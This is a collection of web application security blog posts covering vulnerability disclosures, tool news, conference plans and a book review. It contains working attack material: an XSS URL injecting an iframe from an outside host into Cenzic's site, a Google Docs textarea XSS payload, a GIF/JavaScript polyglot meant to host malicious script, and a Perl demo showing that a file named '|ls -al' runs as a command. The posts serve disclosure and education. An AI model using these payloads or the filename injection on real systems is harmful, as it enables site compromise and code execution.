Erwin Geirnaert sent me an amusing email today about one of the links that Ronald threw up. Yes, Cenzic has had a number of XSS holes, and yes, they have tried to fix them, but they have had some problems in their fixes. Here’s Erwin’s email:

I followed this link from http://www.0×000000.com/?i=372:
http://www.cenzic.com/products_services/download_hailstorm.php?camp=%22%3E%3Ciframe%20src=http://ha.ckers.org/scriptlet.html%20%3C

The HTML source:

<a href="/forms/hailstorm.php?id=3&camp=\"><iframe src=http://ha.ckers.org/NOSCRIPTlet.html <"><img src="../images/products_services/btn_hailstorm_starter.gif" alt="Hailstorm Starter: Try for 45 Days" width="455" height="39" border="0"></a><br>

<a href="/forms/hailstorm.php?id=2&camp=\"><iframe src=http://ha.ckers.org/NOSCRIPTlet.html <"><img src="../images/products_services/btn_try_hailstorm_7days.gif" alt="Hailstorm Core: Try for 7 Days" width="455" height="39" border="0"></a><br>

<a href="/forms/hailstorm.php?id=1&camp=\"><iframe src=http://ha.ckers.org/NOSCRIPTlet.html <"><img src="../images/products_services/btn_buy_hailstorm.gif" alt="Hailstorm Core: Buy Today" width="455" height="39" border="0"></a><br>

So a page with the name NOSCRIPTlet.html will work, no?

Erwin was absolutely right, aaaabsolutely right. Cenzic attempted to mitigate the risk by changing the word “script” to “NOSCRIPT” which doesn’t do much in this case other than change the location of where the vector lives. So I went ahead and created exactly that file (NOSCRIPTlet.html) to prove the point. You cannot do simple substitutions like that and assume they will break every vector. This all comes in reaction to some rather scary patents they issued that appear to break every one else’s ability to work in the industry. Not good.

I’m falling way behind in links that people have been sending me, so rather than post about each one, I’m doing something unprecedented on this site and throwing them all into one post. Yes, there’s lots to talk about, but I’ve been swamped over the last few weeks and will continue to be swamped for another two weeks (on a long term client engagement). So here goes:

Today christ1an launched a new new aggregation website for web application security called Planet-websecurity.org. If you want to get all your web app sec news in one place, this might be a useful service for you to check out. Right now there are only 7 sites or so being culled together (this site is included) but I’m sure more will come in time.

Blogspot is vulnerable to HTML and JavaScript injection. Erwin Geirnaert emailed me about this one a while back and I was a naughty boy and didn’t post it. You want to put up a phishing site on Blogspot? Well it’s easier than you may think. No obfuscation required, just add your own JS and you’re off to the races. Bad, Google, bad.

There are many XSS vulns in Wordpress themes. This is an oldy but a goodie. I don’t use any downloaded themes, because they never go through any sort of third party review (or first party for that matter). And if you don’t want to take my word for it, check out this site. Nasty.

It’s the National Internet Safety Month in June. Do you think we’ll see any drop in identity theft? If the US government is doing campaigns on how to protect yourself, and most of us haven’t even heard about it, I think the money is probably not particularly well spent - especially considering how education doesn’t equate to a drop in fraud ratios. Why can’t I choose not to spend my tax money on things I know will fail? Wouldn’t that be nice? More info on Mustlive’s site.

Ken Clarke sent me an email a while back about how the FBI is having a bot roast. Let’s break the backbone of robots! While a cool project, I’m not sure they are going to get too far without help from the community. I’d love to see a clearing house for this stuff, a la APWG and Cloudmark. Anyone have some disc space and want to write a plugin into mod_security? I think you’d have a big reaction from the community.

Sorry for being so behind on some of this - some of this stuff is a month or more old, but it’s still interesting, and I just never found the time to write about any of it.

While doing a little research into some random stuff for a client I ran into a bot that was spidering in a bad way. Within a few search results pages I found my way to a blog entry by BrontoBytes talking about blocking spiders by HTAccess. This is a pretty interesting pro-active approach to stopping request level attacks, and something used commonly by mod_security, for instance. You can check out the blog entry which shows how to set up an .htaccess file to block some modern robots.

A word of caution, however, is that some of these aren’t “bad” per se - but they may be undesirable. Like Baidu is simply a chinese robot that doesn’t obey the robots.txt file. Some might find that terrible but others might be okay with it. wget and libwww for instance just mean someone is manually interested in your robot. If you consider that bad (system level exhaustion perhaps?), then there are lots of other things you should probably be blocking too. Anyway, it’s a pretty good starter list.

I just got an email from PortSwigger (the guy who built Burp Proxy). If you haven’t used this tool in your manual assessments you are really missing out. It’s actually got me some of the best results I’ve ever had. Very sexy. Anyway, he is now taking requests for his next version, and if you have ever used this tool and found anything particularly fragile or annoying, now is your time to make your suggestions.

This is just to let you know that work is underway on the next release of Burp Suite, which should be available later this year. This will be a major upgrade with lots of new features in all of the tools.

At this point, it would be good to hear any other feature requests that you may have, however large or small. Please reply to me directly or join the discussion here:

http://blog.portswigger.net/

and I’ll address as many as I can.

I’d be grateful if you would pass this email on to anyone else in your team who uses Burp Suite.

I think we should all take the time to make some suggestions as to how we could make this tool even more useful in the future. I appreciate that he’s taking the time and energy to create it, because it’s really one of the most powerful and easy to use applications out there. Combined with the SwitchProxy plugin in Firefox, it’s almost seamless.

Matteo Carli wrote me today to discuss some RFI and JS stuff. We’ve been talking a lot about what uploaded images can do lately, but embedded JS is an interesting one for a few reasons. If you needed a drop for a payload, for instance. Here’s part of his email (edited slightly for formatting):

So i created a simple php test like this:

<?php include 'myimage.gif'; ?>

and the result is like this. Image like this can be saved on hosting site (like imageshack) for using it into RFI attack.

Php is not the only language is possible to embed into image, also JavaScript can be embedded, yes it is! There is two big problem with JS and GIF:
*special binary char
*GIF header

I’ve created a special GIF image.

To maintain GIF header as original i’ve added “=1″ so JS engine not consider header chars as not defined variable. For escape special char i’ve used long comment “/*” and “*/”. This image is a valid GIF and valid JS that can be used as script source like: <script src=myimage.gif>

I thinks it’s useful for evading filter and hosting malicius JS code into wide, well know image hosting site.

The =1 thing is pretty clever and indeed simple things like that can stop a lot of errors from happening (IE is often more strict about that than Firefox but your mileage may vary). Anyway, interesting trick. Nice work by Matteo!

Blackhat is coming in about a month and a half. Normally I don’t even talk about conferences until a week or so before I arrive, but Blackhat is a bigger event than most and there’s almost always a lot more going on there than the other cons. So, for those who are interested, here’s what I know and here’s what I’ll be attending.

Firstly, although Dan Kaminsky’s speech deoesn’t look like it, I talked with him last night, and he will actually be doing a pretty relevent speech to a lot of the stuff I talk about here, specifically anti-DNS pinning and fingerprinting applications. Definitely worth sitting through, even though I’d love to also see Jon Callas’ speech on traffic anaylsis - so I may have a spy go to that speech to take notes for me.

Of course I’ll be attending Jeremiah Grossman’s talk on Intranet hacking without JS - I maaay also make a special guest appearance during the talk if I can get some demo code together in the next month. No promises. If people really twist my arm I may sign some books too.

If I had to pick one of the two speches that Billy Hoffman will be doing I’d probably chose the one on web worms because I think that is far more cutting edge and new, as only a few web worms have surfaced. Although at the same time as that speech is Ariel Waissbein’s speech on ways to dynamically stop attacks using morphing web applications (a topic near and dear to me). So as a result I’ll probably end up going to Billy’s other talk on Premature Ajax-ultation instead of the worm one. I gotta show my support!

I’ll definitely be going to Widow Snyder’s talk on Making and Breaking the browser. If nothing else it’ll be interesting to hear her take on it. However, I also want to hit Stephen Patton’s power talk on social networking data mining, so I might float back and forth between those two talks.

I’ll probably hit up Scott Stender’s talk on blind security testing instead of David Byrne’s talk on anti-DNS pinning, because I don’t think there’s anything new in that speech, even though it’s definitely on-topic. After that David Coffey’s speech on creating a shoestring application security practice might be fun. I always like doing things on the cheap.

Lastly, if I’m not totally burnt out on Blackhat I’ll probably go to Rohyt Belani’s talk on the difficulty of intranet forensics (another topic near and dear to me because we are getting into more expert witness gigs). Plus I think Rohyt will give a good talk because it’s all anecdotes.

And when the doors close is when the party begins - namely the Breach sponsored OWASC/WASC party. If you haven’t already RSVP’d you may have trouble getting it as I heard 200+ people have already asked to come. I don’t have any idea how they are going to fit that many people into the Shadow Bar, so they may have to end up moving it, or spilling out onto the casino floor. If anyone hears about any other good parties, please let me know. Anyway, it’ll be fun and I hope to see a lot of you there!

I was up well before I should have been this morning and I was thinking more about file uploads. Remember back in the day when you inadvertently named a file with a dash or a slash in it? Oh, the joys of trying to clean up files on *Nix systems that had a slash in them. We learned our lesson and moved on with life. Now we are all grown and have a different reason to create files with bad chars in them. This time we want to exploit a file upload. So I created a script that simply look for and opened a file for reading in Perl:

#!/usr/bin/perl

opendir(DIR, ".") || die "Can't open dir: $!\n";
@files = grep { /ls/ && -f "./$_" } readdir(DIR);
foreach $file (@files) {
  open (FILE, "$file");  
  print while (<FILE>);
  close FILE;
}
closedir DIR;

Now here is me showing what is inside the file I named “|ls -al”, then showing what is inside the directory, and lastly, running the code:

[haX0r]$ cat \|ls\ -al
This information is within the file |ls -al
[haX0r]$ ls -al
total 08
drwxr-xr-x 2 haX0r haX0r 512 Jun 19 15:43 .
drwxr-xr-x 37 haX0r haX0r 4096 Jun 18 12:59 ..
-rw-r–r– 1 haX0r haX0r 247 Jun 19 15:46 test.pl
-rw-r–r– 1 haX0r haX0r 0 Jun 19 15:43 |ls -al
[haX0r]$ perl test.pl
[haX0r]$ total 14
drwxr-xr-x 2 haX0r haX0r 512 Jun 19 15:43 .
drwxr-xr-x 37 haX0r haX0r 4096 Jun 18 12:59 ..
-rw-r–r– 1 haX0r haX0r 247 Jun 19 15:46 test.pl
-rw-r–r– 1 haX0r haX0r 0 Jun 19 15:43 |ls -al

Immediately after running the program it ran the filename instead of opening the file. So herein lies another interesting place to use that arbitrary image name creation program I built (I guess it’s not just for XSS afterall - but actual code execution on the host machine). Here would be an example. Encoding spaces might cause problems but I’m sure we can work around that in most cases. Pretty trivial and pretty nasty.

I don’t generally do book reviews (maybe I’ll start if I have to do this much traveling in the future - since it will give me lots of time to read). In this case, the book was really on topic, if a tad out of date. Andres Andreu wrote a book in the 2005-2006 timeframe called “Professional Pen Testing for Web Applications” (I think he could have sold another 10k copies if he had spelled out “Penetration” instead of “Pen” but that’s neither here nor there). The book is actually a really good and quick read as there are lots of pictures and examples to drive the text along.

Normally I find it tedious to get through penetration testing style books, because the authors generally only talk about one or two tools (generally nmap and insert one or two other tools here) and stick with them for the entire book. Andres does a really nice job of talking about dozens of different tools and how they are useful from a web application security perspective. One section that I found a tad cheezy though was the ethics of what you can and can’t do during an audit. I don’t know why, but I’ve always found that stuff to be obvious. For instance while it does say extortion is not okay (I hope that’s also obvious to everyone reading this), it fails to mention bribery, rubber hose cryptanalysis, intimidation, kidnapping, murder, or a host of other things that actually do work and three letter agencies worldwide have employed. So don’t go looking at that chart as saying “Andres didn’t say I couldn’t.” The chart made me and id laugh. If anyone wants to sign up for that kind of audit, just let us know. We’ve got the blowtorch and the pliers standing by. The ethics section of the book was short, and it got better quickly thereafter.

Anyway, sure, some parts of the book are out of date, as you’d expect with a book written 1-2 years ago, but a lot of the book is timeless. The general tactics put in place, how the different threat modeling works, and how you document what you find is all good information. I’ve had my own way of doing things for years, but it’s always nice to hear someone else’s perspective. The best part of the book for me, was that since it was slightly out of date, I got to hear a lot more about technologies we tend to forget about since they aren’t used that much any longer. There weren’t many blogs detailing this stuff back then to read, so this is a bit of a blast from the past. Granted, he doesn’t talk at all about a lot of the more modern stuff since it didn’t exist yet, but I found it a really interesting refresher course in the way things used to be, and the way we should probably continue to think about legacy systems.

The cons are that he doesn’t discuss manual assessment using things like telnet hardly at all, focusing more on the existing tools, at least half a chapter when you add it all up is talking about buffer overlows without going into enough detail to actually show a working example in the wild, he talks quite a bit about SSL security (which really isn’t much of a problem most of the time), and it makes a big leap that you already know how to develop programs, run programs and have access to *Nix environments. That’s true in my case, and on the cover it even says “Programmer to Programmer.” Still it’s definitely not meant for a beginner with only access to Windows and no idea what Cygwin is. Overall, it was probably a four out of five star type book when it came out, but because it’s a little out of date it’s probably more like three stars now. Still, it makes a nice addition to the bookshelf, and it got my brain thinking.

Today, Hong emailed me with yet another Google XSS vulnerability. This time it is in the way Google’s filtering engines work to protect its users from malicious HTML in the Google documents. I’ve seen this exact hole a number of times in sites that allow WYSIWYG editors. Unfortunately, just because it’s rendered, it doesn’t make it safe. Things like that are also often vulnerable to iframe injection as well. Here’s his email. Edited only for formatting.

I find out a hole in Google Docs XSS filter. Google Docs does not know how textarea works, If we inject the following HTML code to the document.

<textarea><a href=" http://www.site.com/
</textarea><script>alert('xss')</script>"></textarea>

Google XSS filter does not filter out <script>alert('xss')</script> due to
they inside a html tag encapsulation. But in fact browser treats <a href="http://www.site.com/ as plain text inside textarea, then run the script follow it.

Here is a demo.

Google has had a pretty terrible track record when it comes to these vulnerabilities, as have many other sites of this complexity, and this represents a few failings. Firstly, understanding what HTML looks like, and secondly understanding that rich HTML can jump out of itself in weird ways when you just throw user text in the middle of your page. Hopefully they fix this one quickly.

Yesterday, christ1an published an ultimatum to Google and Youtube regarding vulnerabilities in their applications. His deal - work with him within the next few weeks or expect full disclosure on one or more vulnerabilities. From his posting:

Taking that into account I’m going to have one last try and give you two weeks from now to contact me. If you don’t, I am obliged to disclose all vulnerabilties in public.

christ1an is not the only person to voice concerns over how companies respond to vulnerability researchers and voice severe frustration based on the lack of response. It’ll be interesting to see how this one pans out, as obviously the companies are less integrated than they probably should be, and even through all of the vulnerabilities in Google like the most recent Google vulnerability found by Mustlive.